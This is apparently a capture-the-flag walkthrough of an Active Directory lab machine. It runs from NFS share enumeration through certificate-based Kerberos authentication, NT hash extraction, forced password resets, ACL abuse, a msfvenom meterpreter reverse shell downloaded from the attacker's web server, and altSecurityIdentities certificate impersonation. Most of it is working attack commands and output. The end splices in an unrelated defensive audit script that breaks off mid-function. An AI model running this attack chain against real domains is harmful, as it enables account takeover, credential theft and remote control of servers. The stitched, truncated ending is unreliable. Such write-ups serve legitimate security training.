Scepter

General Information
IP address: xx.xx.xx.xx
Operating System Name (Distribution): Microsoft Windows Server 2019 Standard
Operating System Kernel Version: 10.0.17763 N/A Build 17763
Web Server Software and Version: —
Open Ports: 53, 88, 111, 135, 139, 389, 445, 464, 593, 636, 2049, 3268, 3269, 5985, 5986

Discovered Flags

💡 Paste the flag into the designated section. Also paste a screenshot of the screen where the flag was found into this section.

User Flag

💡 User Flag: 109ed4eb16a3e6be0be8368c0f6ca1775

Root Flag

💡 Root Flag: bfa210003342f1962a476d176a2fe57dd

Discovered Vulnerabilities

💡 Fill in every vulnerability you found here and leave a link where detailed information about it can be found. You must also explain what the vulnerability can lead to and which exploit it can be broken with. The first vulnerability listed is given to you as an example. Enter every vulnerability you manage to find.

CVE-XXXX-XXXX: This CVE is present in version 2.X.X of program X and helps an attacker carry out attack X. This vulnerability is called the X vulnerability. It can be studied in detail via this link. [Leave a link.]
Exploit link: must be provided if one exists.

Report

💡 Describe in detail what you did at each stage, with screenshots and the exploits you used.

Enumeration (Information Gathering)

We have the IP xx.xx.xx.xx and scan it with nmap


┌──(kali㉿kali)-[~]
└─$ nmap -sSCV -Pn xx.xx.xx.xx --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-19 15:34 EDT
Nmap scan report for 10.10.11.65
Host is up (0.097s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-20 03:34:33Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-20T03:35:32+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
|_ssl-date: 2025-04-20T03:35:32+00:00; +8h00m00s from scanner time.
2049/tcp open nlockmgr 1-4 (RPC #100021)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
|_ssl-date: 2025-04-20T03:35:32+00:00; +8h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-20T03:35:32+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T00:21:41
|_Not valid after: 2025-11-01T00:41:41
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_ssl-date: 2025-04-20T03:35:32+00:00; +8h00m00s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-04-20T03:35:22
|_ start_date: N/A
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.85 seconds

We write dc01.scepter.htb and scepter.htb into /etc/hosts

xx.xx.xx.xx dc01.scepter.htb scepter.htb

now we test SMB

┌──(kali㉿kali)-[~/Desktop/CVE-2023-46818-Exploit]
└─$ enum4linux-ng -A xx.xx.xx.xx
ENUM4LINUX - next generation (v1.3.4)

==========================
| Target Information |
==========================
[*] Target ........... xx.xx.xx.xx
[*] Username ......... ''
[*] Random Username .. 'jzmwvnll'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

====================================
| Listener Scan on 10.10.11.65 |
====================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

===================================================
| Domain Information via LDAP for xx.xx.xx.xx |
===================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: scepter.htb

==========================================================
| NetBIOS Names and Workgroup/Domain for xx.xx.xx.xx |
==========================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out

========================================
| SMB Dialect Check on xx.xx.xx.xx |
========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true

==========================================================
| Domain Information via SMB session for xx.xx.xx.xx |
==========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: DC01
NetBIOS domain name: SCEPTER
DNS domain: scepter.htb
FQDN: dc01.scepter.htb
Derived membership: domain member
Derived domain: SCEPTER

========================================
| RPC Session Check on xx.xx.xx.xx |
========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE

==================================================
| Domain Information via RPC for xx.xx.xx.xx |
==================================================
[+] Domain: SCEPTER
[+] Domain SID: S-1-5-21-74879546-916818434-740295365
[+] Membership: domain member

==============================================
| OS Information via RPC for xx.xx.xx.xx |
==============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null

====================================
| Users via RPC on xx.xx.xx.xx |
====================================
[*] Enumerating users via 'querydispinfo'
[-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED
[*] Enumerating users via 'enumdomusers'
[-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED

=====================================
| Groups via RPC on xx.xx.xx.xx |
=====================================
[*] Enumerating local groups
[-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_DENIED
[*] Enumerating builtin groups
[-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DENIED
[*] Enumerating domain groups
[-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED

=====================================
| Shares via RPC on xx.xx.xx.xx |
=====================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user

========================================
| Policies via RPC for xx.xx.xx.xx |
========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed

========================================
| Printers via RPC for xx.xx.xx.xx |
========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED

Completed after 19.83 seconds

SMB is closed; a username and password are needed to use it.

2049 (NFS) is normally found on Linux systems, but here it is open as well, so we check it


┌──(kali㉿kali)-[~/Desktop/]
└─$ showmount -e xx.xx.xx.xx
Export list for xx.xx.xx.xx:
/helpdesk (everyone)

The /helpdesk directory is exported over NFS and it is open to everyone (that is, anyone at all)! This is a very useful and exploitable situation.

┌──(kali㉿kali)-[~/Desktop/]
└─$ mkdir /tmp/helpdesk-nfs

┌──(kali㉿kali)-[~/Desktop/]
└─$ sudo mount -t nfs xx.xx.xx.xx:/helpdesk /tmp/helpdesk-nfs

┌──(kali㉿kali)-[~]
└─$ sudo ls -la /tmp/helpdesk-nfs
total 21
drwx------ 2 nobody nogroup 64 Nov 1 23:02 .
drwxrwxrwt 25 root root 580 Apr 19 15:43 ..
-rwx------ 1 nobody nogroup 2484 Nov 1 23:01 baker.crt
-rwx------ 1 nobody nogroup 2029 Nov 1 23:01 baker.key
-rwx------ 1 nobody nogroup 3315 Nov 1 23:01 clark.pfx
-rwx------ 1 nobody nogroup 3315 Nov 1 23:01 lewis.pfx
-rwx------ 1 nobody nogroup 3315 Nov 1 23:02 scott.pfx

Exploitation (Breaking In)

Now


┌──(root㉿kali)-[/tmp/helpdesk-nfs]
└─# sudo openssl pkcs12 -export -out /home/kali/Desktop/HTB/Specter/baker.pfx -inkey baker.key -in baker.crt -passout pass:
Enter pass phrase for baker.key:


┌──(kali㉿kali)-[~/Desktop/HTB/Specter]
└─$ ll
total 4
-rw------- 1 root root 3379 Apr 19 16:36 baker.pfx


┌──(kali㉿kali)-[~/Desktop/HTB/Specter]
└─$ sudo chmod 777 baker.pfx
[sudo] password for kali:


┌──(kali㉿kali)-[~/Desktop/HTB/Specter]
└─$ sudo ntpdate xx.xx.xx.xx | certipy-ad auth -pfx baker.pfx -dc-ip 10.10.11.65
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: d.baker@scepter.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'd.baker.ccache'
[*] Trying to retrieve NT hash for 'd.baker'
[-] Got error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace


┌──(kali㉿kali)-[~/Desktop/HTB/Specter]
└─$ sudo ntpdate xx.xx.xx.xx | certipy-ad auth -pfx baker.pfx -dc-ip xx.xx.xx.xx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: d.baker@scepter.htb


[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'd.baker.ccache'
[*] Trying to retrieve NT hash for 'd.baker'
[*] Got hash for 'd.baker@scepter.htb': aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f227ce

Now we need to add a nameserver to /etc/resolv.conf


┌──(root㉿kali)-[/home/kali/Desktop/HTB/Specter]
└─# cat /etc/resolv.conf
nameserver xx.xx.xx.xx
nameserver 8.8.8.8
nameserver 1.1.1.1


┌──(root㉿kali)-[/home/kali/Desktop/HTB/Specter]
└─# sudo bloodhound-python -u 'd.baker' --hashes 'aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f227ce' -d scepter.htb -dc dc01.scepter.htb --auth-method ntlm -c All --zip --disable-autogc
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: scepter.htb
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 00M 24S
INFO: Compressing output into 20250419170124_bloodhound.zip

┌──(root㉿kali)-[/home/kali/Desktop/HTB/Specter]
└─# ll
total 160
-rw-r--r-- 1 root root 152421 Apr 19 17:01 20250419170124_bloodhound.zip
-rwxrwxrwx 1 root root 3379 Apr 19 16:36 baker.pfx
-rw-rw-r-- 1 kali kali 1542 Apr 20 2025 d.baker.ccache

The d.baker user has the right to change the a.carter user's password, and we take advantage of that


┌──(kali㉿kali)-[~/…/Haze/splunksecrets/venv/bin]
└─$ impacket-changepasswd 'scepter.htb'/'a.carter'@xx.xx.xx.xx -reset -altuser 'd.baker' -althash :'18b5fb0d99e7a475316213c15b6f227ce'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

New password: Password123


Retype new password: Password123
[*] Setting the password of scepter.htb\a.carter as scepter.htb\d.baker
[*] Connecting to DCE/RPC as scepter.htb\d.baker
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.


┌──(kali㉿kali)-[~/…/Haze/splunksecrets/venv/bin]
└─$ nxc smb xx.xx.xx.xx -u 'a.carter' -p 'Password123'
SMB xx.xx.xx.xx 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:scepter.htb) (signing:True) (SMBv1:False)
SMB xx.xx.xx.xx 445 DC01 [+] scepter.htb\a.carter:newpassword123

Now we scan again with bloodhound-python as the a.carter user


┌──(kali㉿kali)-[~/Desktop/HTB/Specter]
└─$ bloodhound-python -c ALL -u a.carter -p 'Password123' -d scepter.htb -ns xx.xx.xx.xx --zip

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)


INFO: Found AD domain: scepter.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 00M 23S
INFO: Compressing output into 20250419174424_bloodhound.zip

┌──(kali㉿kali)-[~/Desktop/HTB/Specter]
└─$ ll
total 312
-rw-r--r-- 1 root root 152421 Apr 19 17:01 20250419170124_bloodhound.zip
-rw-rw-r-- 1 kali kali 152696 Apr 19 17:44 20250419174424_bloodhound.zip
-rwxrwxrwx 1 root root 3379 Apr 19 16:36 baker.pfx
-rw-rw-r-- 1 kali kali 1542 Apr 20 2025 d.baker.ccache

We obtain a Kerberos TGT for d.baker using the hash; this TGT is saved to the d.baker.ccache file, and we export it


┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# ntpdate -u xx.xx.xx.xx | impacket-getTGT -no-pass -hashes :18b5fb0d99e7a475316213c15b6f22ce scepter.htb/'d.baker'@dc01.scepter.htb

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in [email protected]

export [email protected]

The d.baker user can change the a.carter user's password. We change it through the ForceChangePassword right


┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# ntpdate -u xx.xx.xx.xx | bloodyAD -d scepter.htb -u d.baker -k --host dc01.scepter.htb --dc-ip xx.xx.xx.xx set password a.carter Password123
[+] Password changed successfully!

We are a member of the IT support group, and that group has GenericAll over STAFF ACCESS CERTIFICATE.
We grant the a.carter user full control (FullControl) over the object in the OU named STAFF ACCESS CERTIFICATE

┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# ntpdate -u xx.xx.xx.xx | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb --dc-ip xx.xx.xx.xx add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter
[+] a.carter has now GenericAll on OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB

a.carter can now:

edit the users inside this OU

create new users or modify existing ones

grant delegation, change the DACL, and so on

Through the a.carter user we try changing the mail attribute of the d.baker user and check that it works


┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# ntpdate -u xx.xx.xx.xx | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb set object d.baker mail -v h.brown@scepter.htb
[+] d.baker's mail has been updated'

It worked

Using certipy-ad, we submit a certificate request for the d.baker user and try to obtain a certificate


┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# ntpdate -u xx.xx.xx.xx | certipy-ad req -username "d.baker@scepter.htb" -hashes 18b5fb0d99e7a475316213c15b6f227ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence '\('
"(0x[a-zA-Z0-9]+) \([-]?[0-9]+ ",
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 20
[*] Got certificate without identification
[*] Certificate has no object SID
[*] Saved certificate and private key to 'd.baker.pfx'

The certificate request was completed successfully.

Using certipy-ad with the d.baker.pfx certificate, we perform authentication as the h.brown@scepter.htb user and try to obtain a Ticket Granting Ticket (TGT)

┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# sudo ntpdate -u xx.xx.xx.xx

┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# ntpdate -u xx.xx.xx.xx | certipy-ad auth -pfx d.baker.pfx -domain scepter.htb -dc-ip xx.xx.xx.xx -username h.brown
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate


[*] Using principal: h.brown@scepter.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'h.brown.ccache'
[*] Trying to retrieve NT hash for 'h.brown'
[*] Got hash for 'h.brown@scepter.htb': aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a70c

We have obtained h.brown.ccache, so now we can log in as that user with it

We add the following to /etc/krb5.conf
cat /etc/krb5.conf
[libdefaults]
default_realm = SCEPTER.HTB
dns_lookup_realm = false
dns_lookup_kdc = true

[realms]
SCEPTER.HTB = {
kdc = dc01.scepter.htb
admin_server = dc01.scepter.htb
}

[domain_realm]
.scepter.htb = SCEPTER.HTB
scepter.htb = SCEPTER.HTB

Initial Access (Gaining Access)

Now we save the cache and connect with evil-winrm

┌──(root㉿kali)-[/home/…/Desktop/HTB/Specter/kerbrute]
└─# ll
total 100
drwxr-xr-x 2 root root 4096 Apr 19 18:53 cmd
-rw-r--r-- 1 root root 1342 Apr 20 2025 [email protected]
-rw-r--r-- 1 root root 2913 Apr 19 21:07 d.baker.pfx
drwxr-xr-x 2 root root 4096 Apr 19 18:55 dist
-rw-r--r-- 1 root root 394 Apr 19 18:53 go.mod
-rw-r--r-- 1 root root 33180 Apr 19 18:53 go.sum
-rw-r--r-- 1 root root 1558 Apr 20 2025 h.brown.ccache


┌──(root㉿kali)-[/home/…/Desktop/HTB/Specter/kerbrute]
└─# export KRB5CCNAME=./h.brown.ccache

┌──(root㉿kali)-[/home/…/Desktop/HTB/Specter/kerbrute]
└─# klist
Ticket cache: FILE:./h.brown.ccache
Default principal: h.brown@SCEPTER.HTB

Valid starting Expires Service principal
04/20/2025 05:08:18 04/20/2025 09:08:18 krbtgt/SCEPTER.HTB@SCEPTER.HTB
renew until 04/20/2025 09:08:18


┌──(root㉿kali)-[/home/…/Desktop/HTB/Specter/kerbrute]
└─# ntpdate -u xx.xx.xx.xx
2025-04-20 05:17:08.116561 (-0400) +28798.361028 +/- 0.070279 10.10.11.65 s1 no-leap
CLOCK: time stepped by 28798.361028


┌──(root㉿kali)-[/home/…/Desktop/HTB/Specter/kerbrute]
└─# evil-winrm -i dc01.scepter.htb -r scepter.htb -u h.brown

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: User is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint


*Evil-WinRM* PS C:\Users\h.brown\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\h.brown\Desktop> dir

Directory: C:\Users\h.brown\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/19/2025 7:56 PM 34 user.txt

*Evil-WinRM* PS C:\Users\h.brown\Desktop> type user.txt


109ed4eb16a3e6be0be8368c0f6ca1775
*Evil-WinRM* PS C:\Users\h.brown\Desktop>

Privilege Escalation (Escalating Privileges)

Now we set up a connection with Metasploit


┌──(kali㉿kali)-[~/Desktop/Tools]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.14.xx LPORT=5555 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe


┌──(kali㉿kali)-[~/Desktop/Tools]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
======================================================================

*Evil-WinRM* PS C:\Users\h.brown\Documents> cd /
*Evil-WinRM* PS C:\> cd Temp
*Evil-WinRM* PS C:\Temp> Invoke-WebRequest -Uri "http://xx.xx.14.xx:8000/shell.exe" -Outfile "C:\Temp\shell.exe"
*Evil-WinRM* PS C:\Temp> dir

Directory: C:\Temp

Mode LastWriteTime Length Name


---- ------------- ------ ----
-a---- 4/20/2025 12:53 PM 7168 shell.exe

*Evil-WinRM* PS C:\Temp> ./shell.exe

========================================================================
msf6 exploit(multi/handler) > use exploit/multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST xx.xx.14.xx
LHOST => xx.xx.14.xx
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on xx.xx.14.xx:5555
[*] Sending stage (203846 bytes) to xx.xx.xx.xx
[*] Meterpreter session 1 opened (xx.xx.14.xx:5555 -> xx.xx.xx.xx:60904) at 2025-04-20 07:55:27 -0400

meterpreter > shell


Process 4912 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.7136]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Temp>

Through the a.carter user we add a new computer to the domain

Computer name: CN=meow

Password: Password123


┌──(root㉿kali)-[/home/kali/Desktop/HTB/Specter]
└─# ntpdate -u xx.xx.xx.xx | bloodyAD --host dc01.scepter.htb -d scepter.htb -u a.carter -p 'Password123' --dc-ip xx.xx.xx.xx add computer meow 'Password123'
[+] meow created

Using the computer account named meow$, we try to obtain a computer certificate through Active Directory Certificate Services (AD CS)


┌──(root㉿kali)-[/home/kali/Desktop/HTB/Specter]
└─# ntpdate -u xx.xx.xx.xx | certipy-ad req -ca scepter-DC01-CA -template Machine -target xx.xx.xx.xx -username meow$ -password 'Password123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC


[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with DNS Host Name 'meow.scepter.htb'
[*] Certificate object SID is 'S-1-5-21-74879546-916818434-740295365-9101'
[*] Saved certificate and private key to 'meow.pfx'

We extract the obtained certificate into .crt format


┌──(root㉿kali)-[/home/kali/Desktop/HTB/Specter]
└─# certipy-ad cert -pfx meow.pfx -nokey -out meow.crt
Certipy v4.8.2 - by Oliver Lyak (ly4k)

We analyse the certificate


┌──(root㉿kali)-[/home/kali/Desktop/HTB/Specter]
└─# openssl x509 -in meow.crt -noout -serial -issuer
serial=6200000005C9A87AF961EDF48E000000000005
issuer=DC=htb, DC=scepter, CN=scepter-DC01-CA

We insert a colon between every two characters of the serial to turn it into a binary string


62:00:00:00:05:C9:A8:7A:F9:61:ED:F4:8E:00:00:00:00:00:05

In Active Directory Certificate Services (AD CS) every certificate is identified by Issuer + SerialNumber. To convert to that format we reverse the serial, putting the certificate into the format required to bind it to an AD user

nano conv.py

================================================================================

import argparse

def convert(serial, issuer):
    # Strip the colons openssl prints and byte-reverse the serial:
    # AD stores the serial little-endian in the <SR> field.
    serial = serial.replace(':', '').lower()
    serial_bytes = bytearray.fromhex(serial)
    serial_bytes.reverse()
    serial_hex = ''.join(['%02x' % b for b in serial_bytes])

    # Reverse the RDN order of the issuer DN
    # (CN=...,DC=...,DC=... becomes DC=...,DC=...,CN=...).
    issuer_parts = issuer.split(',')
    issuer_parts = [p.strip() for p in issuer_parts]
    issuer_parts.reverse()
    issuer_str = ','.join(issuer_parts)

    # altSecurityIdentities value in the X509:<I>issuer<SR>serial form
    print(f"X509:<I>{issuer_str}<SR>{serial_hex}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-serial', required=True, help='Certificate serial (colon separated)')
    parser.add_argument('-issuer', required=True, help='Certificate issuer')
    args = parser.parse_args()

    convert(args.serial, args.issuer)

We store the certificate identifier (altSecurityIdentities) in a variable called map


┌──(root㉿kali)-[/home/kali/Desktop/HTB/Specter]
└─# python3 conv.py -serial '62:00:00:00:05:C9:A8:7A:F9:61:ED:F4:8E:00:00:00:00:00:05' -issuer 'CN=scepter-DC01-CA,DC=scepter,DC=htb'
X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0500000000008ef4ed61f97aa8c90500000062
============================================================================

meterpreter > shell


Process 1028 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.7136]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Temp>powershell
powershell

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Temp> $map = 'X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0500000000008ef4ed61f97aa8c90500000062'
$map = 'X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0500000000008ef4ed61f97aa8c90500000062'

We add the current certificate to the altSecurityIdentities attribute of the p.adams user

PS C:\Temp> Set-ADUser p.adams -Replace @{altSecurityIdentities=$map}
Set-ADUser p.adams -Replace @{altSecurityIdentities=$map}
PS C:\Temp>

Now, with the Active Directory user p.adams:

logging in through this certificate becomes possible

that is, the meow.pfx certificate now works for the p.adams user

This makes "certificate impersonation" possible, i.e. "logging in as another user through a certificate".

Now we obtain a TGT through the certificate
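As an added example that is not part of this writeup and not the page's conv.py, the following Python builds the same X509:<I>issuer<SR>serial value from the page's serial and issuer, classifies altSecurityIdentities values as strong or weak according to Microsoft KB5014754, and audits a user's mappings against the CA's issued-certificate records, which is how a defender spots exactly this misuse: a strong mapping on p.adams that resolves to a certificate issued to meow$. The issued-certificate record, the audit_user_mappings helper name and the extra <S> mapping are constructed for the example.

```python
"""Build and audit altSecurityIdentities values of the form X509:<I>issuer<SR>serial.

Stand-alone example; the issued-certificate record below is constructed from the
values shown on this page and is not a real CA database export."""
import re

# Mapping types Microsoft classifies as strong (KB5014754). Any other X509:
# form (<S>, <RFC822>, <I> combined with <S>) is a weak mapping.
STRONG_TAG_SETS = ({"I", "SR"}, {"SKI"}, {"SHA1-PUKEY"})
_TAG_RE = re.compile(r"<([A-Z0-9-]+)>([^<]*)")


def reverse_serial(serial_hex: str) -> str:
    """Byte-reverse a hex serial (colons allowed); <SR> stores it little-endian."""
    return bytes.fromhex(serial_hex.replace(":", ""))[::-1].hex()


def reverse_dn(dn: str) -> str:
    """Flip RDN order, e.g. 'CN=x,DC=y,DC=z' -> 'DC=z,DC=y,CN=x'.
    Assumes no escaped commas inside RDN values."""
    return ",".join(part.strip() for part in dn.split(",")[::-1])


def build_mapping(serial_hex: str, issuer_dn: str) -> str:
    """Same construction as the page's conv.py: reversed issuer, reversed serial."""
    return f"X509:<I>{reverse_dn(issuer_dn)}<SR>{reverse_serial(serial_hex)}"


def parse_mapping(mapping: str) -> dict:
    """Split 'X509:<TAG>value<TAG>value' into {tag: value}."""
    if not mapping.startswith("X509:"):
        raise ValueError(f"not an X509 mapping: {mapping!r}")
    fields = dict(_TAG_RE.findall(mapping[len("X509:"):]))
    if not fields:
        raise ValueError(f"no <TAG> fields in {mapping!r}")
    return fields


def is_strong_mapping(mapping: str) -> bool:
    """True only for the tag combinations KB5014754 treats as strong."""
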